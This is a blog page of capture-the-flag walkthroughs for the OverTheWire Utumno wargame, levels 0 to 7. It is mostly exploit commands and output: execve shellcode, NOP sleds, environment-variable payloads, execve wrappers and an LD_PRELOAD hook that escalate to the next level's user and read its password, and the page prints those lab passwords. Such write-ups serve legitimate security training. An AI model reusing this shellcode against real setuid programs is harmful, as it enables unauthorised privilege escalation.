Showing posts with label utumno. Show all posts
Showing posts with label utumno. Show all posts

# Utumno wargame: Level 7


# ssh utumno7@utumno.labs.overthewire.org
utumno7@utumno.labs.overthewire.org's password:746f7469717565676165

utumno7@melissa$ file /utumno/utumno7
/utumno/utumno7: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
utumno7@melissa$ export LD_POINTER_GUARD=0
utumno7@melissa$ /utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
^Z
[1]+  Stopped     /utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
utumno7@melissa$ jobs -l
[1]+ 30392 Stopped     /utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
utumno7@melissa$ kill -10 30392
utumno7@melissa$ fg
/utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
^Z
[1]+  Stopped     /utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
utumno7@melissa$ kill -12 30392
utumno7@melissa$ fg
/utumno/utumno7 `perl -e 'print "\x90"x118 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xff\x23\xab\xff" . "\xff\x23\xab\xff"'`
$ /usr/bin/whoami
utumno8
$ /bin/cat /etc/utumno_pass/utumno8
6a616579656574696176
A special thanks to Xelenonz.

# Utumno wargame: Level 6


# ssh utumno6@utumno.labs.overthewire.org
utumno6@utumno.labs.overthewire.org's password:65696c75717569657468

utumno6@melissa$ file /utumno/utumno6
/utumno/utumno6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno6@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno6@melissa$ /tmp/u6/getenvaddr EGG /utumno/utumno6
EGG will be at 0xffffd977
utumno6@melissa$ /utumno/utumno6 `perl -e 'print "-1 ffffd6ac \x77\xd9\xff\xff" . "\xff"x60 . "\x77\xd9\xff\xff"'`
Table position -1 has value -9865
Description: 1ˡ
                Rh//shh/binãRâSáÍ
$ /usr/bin/whoami
utumno7
$ /bin/cat /etc/utumno_pass/utumno7
746f7469717565676165

# Utumno wargame: Level 5


# ssh utumno5@utumno.labs.overthewire.org
utumno5@utumno.labs.overthewire.org's password:776f756361656a69656b

utumno5@melissa$ file /utumno/utumno5
/utumno/utumno5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno5@melissa$ mkdir /tmp/u5
utumno5@melissa$ cd !$
utumno5@melissa$ cat execve2.c
#include <unistd.h>
int main(){
        char *args[4];
        char *env[12];
        args[0]="/tmp/u5/getenvaddr";
        args[1]="EGG";
        args[2]="/utumno/utumno5";
        args[3]="NULL";
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xa1\xa2\xa3\xa4";
        env[10]="EGG=\xb1\xb2\xb3\xb4\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/tmp/u5/getenvaddr",args,env);
}
utumno5@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2])); // *2 -> Name only in argv but not in env var
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}
utumno5@melissa$ gcc -m32 -o execve2 execve2.c && gcc -m32 -o getenvaddr getenvaddr.c
utumno5@melissa$ ./execve2
EGG will be at 0xffffdfc9
utumno5@melissa$ gdb -q
(gdb) #>address+shellcode
(gdb) print /x 0xffffdfc9 - 0x4
$1 = 0xffffdfc5
(gdb) #>EGG=address+shellcode
(gdb) print /x 0xffffdfc9 + 0x4
$2 = 0xffffdfcd
(gdb) #>shellcode
utumno5@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[12];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc5\xdf\xff\xff";
        env[10]="EGG=\xcd\xdf\xff\xff\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/utumno/utumno5",NULL,env);
}
utumno5@melissa$ gcc -m32 -o execve execve.c
utumno5@melissa$ ./execve
Here we go - Åßÿÿ
$ /usr/bin/whoami
utumno6
$ /bin/cat /etc/utumno_pass/utumno6
65696c75717569657468

# Utumno wargame: Level 4


# ssh utumno4@utumno.labs.overthewire.org
utumno4@utumno.labs.overthewire.org's password:6f6f6769656c656f6761

utumno4@melissa$ file /utumno/utumno4
/utumno/utumno4: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno4@melissa$ /utumno/utumno4 65536 `perl -e 'print "\x90"x65250 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x18 . "\xdd\xdd\xfd\xff" . "\x90"x238'`
$ /usr/bin/whoami
utumno5
$ /bin/cat /etc/utumno_pass/utumno5
776f756361656a69656b

# Utumno wargame: Level 3


# ssh utumno3@utumno.labs.overthewire.org
utumno3@utumno.labs.overthewire.org's password:7a757564616669696e65

utumno3@melissa$ file /utumno/utumno3
/utumno/utumno3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno3@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno3@melissa$ (perl -e 'print "\x2c\x77\x2e\xd9\x28\xff\x26\xff" . "\n"x9' ; cat) | /utumno/utumno3
/usr/bin/whoami
utumno4
/bin/cat /etc/utumno_pass/utumno4
6f6f6769656c656f6761
Pseudocode

a = '0'
b = '0'
[begin]
 a = getchar()
 if (a == EOF) | (b > 23) then exit()
 c = xor(a,3*b)
 d = $esp + 32 + c
 [d] = getchar()
 b = b + 1
 jump to [begin]

# Utumno wargame: Level 2


# ssh utumno2@utumno.labs.overthewire.org
utumno2@utumno.labs.overthewire.org's password:63656577616365697068

utumno2@melissa$ file /utumno/utumno2
/utumno/utumno2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno2@melissa$ mkdir /tmp/u2
utumno2@melissa$ cd !$
utumno2@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[11];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\xeb\x0f\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x04\xde\xff\xff\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[10]=NULL;
        execve("/utumno/utumno2",NULL,env);
}
utumno2@melissa$ gcc -m32 -o execve execve.c && ./execve
$ /usr/bin/whoami
utumno3
$ /bin/cat /etc/utumno_pass/utumno3
7a757564616669696e65

# Utumno wargame: Level 1


# ssh utumno1@utumno.labs.overthewire.org
utumno1@utumno.labs.overthewire.org's password:61617468616579696577

utumno1@melissa$ file /utumno/utumno1
/utumno/utumno1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno1@melissa$ mkdir /tmp/u1
utumno1@melissa$ cd !$
utumno1@melissa$ ln -s /bin/sh mysh
utumno1@melissa$ touch `perl -e 'print "sh_\x31\xc0\x99\xb0\x0b\x52\x68\x6d\x79\x73\x68\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno1@melissa$ /utumno/utumno1 /tmp/u1
$ /usr/bin/whoami
utumno2
$ /bin/cat /etc/utumno_pass/utumno2
63656577616365697068

# Utumno wargame: Level 0


# ssh utumno0@utumno.labs.overthewire.org
utumno0@utumno.labs.overthewire.org's password:7574756d6e6f30

utumno0@melissa$ file /utumno/utumno0
/utumno/utumno0: setuid executable, regular file, no read permission
utumno0@melissa$ mkdir /tmp/u0
utumno0@melissa$ cd !$
utumno0@melissa$ cat hook.c
#include <stdio.h>
#include <unistd.h>

int puts(const char *s){
        char *p;
        int i;
        write(1,"Hooked: puts function\n",22);
        printf("%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x\n");
        for(i=0x80484bb-11;i<0x80484bb+11;i++){
                p=i;
                printf("%c",*p);
        }

}
utumno0@melissa$ gcc -m32 -fPIC -c hook.c -o hook.o && ld -shared -m elf_i386 -o hook.so hook.o -ldl
utumno0@melissa$ strace -s 100 -E LD_PRELOAD=./hook.so -e trace=write /utumno/utumno0
[ Process PID=11490 runs in 32 bit mode. ]
write(1, "Hooked: puts function\n", 22Hooked: puts function
) = 22
write(1, "f7fdb278-16-0-ffffd738-f7ff3f70-1-f7fdb200-ffffd7e4-f7fd0ff4-ffffd738-80483d1-80484bb\n", 86f7fdb278-16-0-ffffd738-f7ff3f70-1-f7fdb200-ffffd7e4-f7fd0ff4-ffffd738-80483d1-80484bb
) = 86
write(1, "61617468616579696577\0Read me! :P", 3261617468616579696577Read me! :P) = 32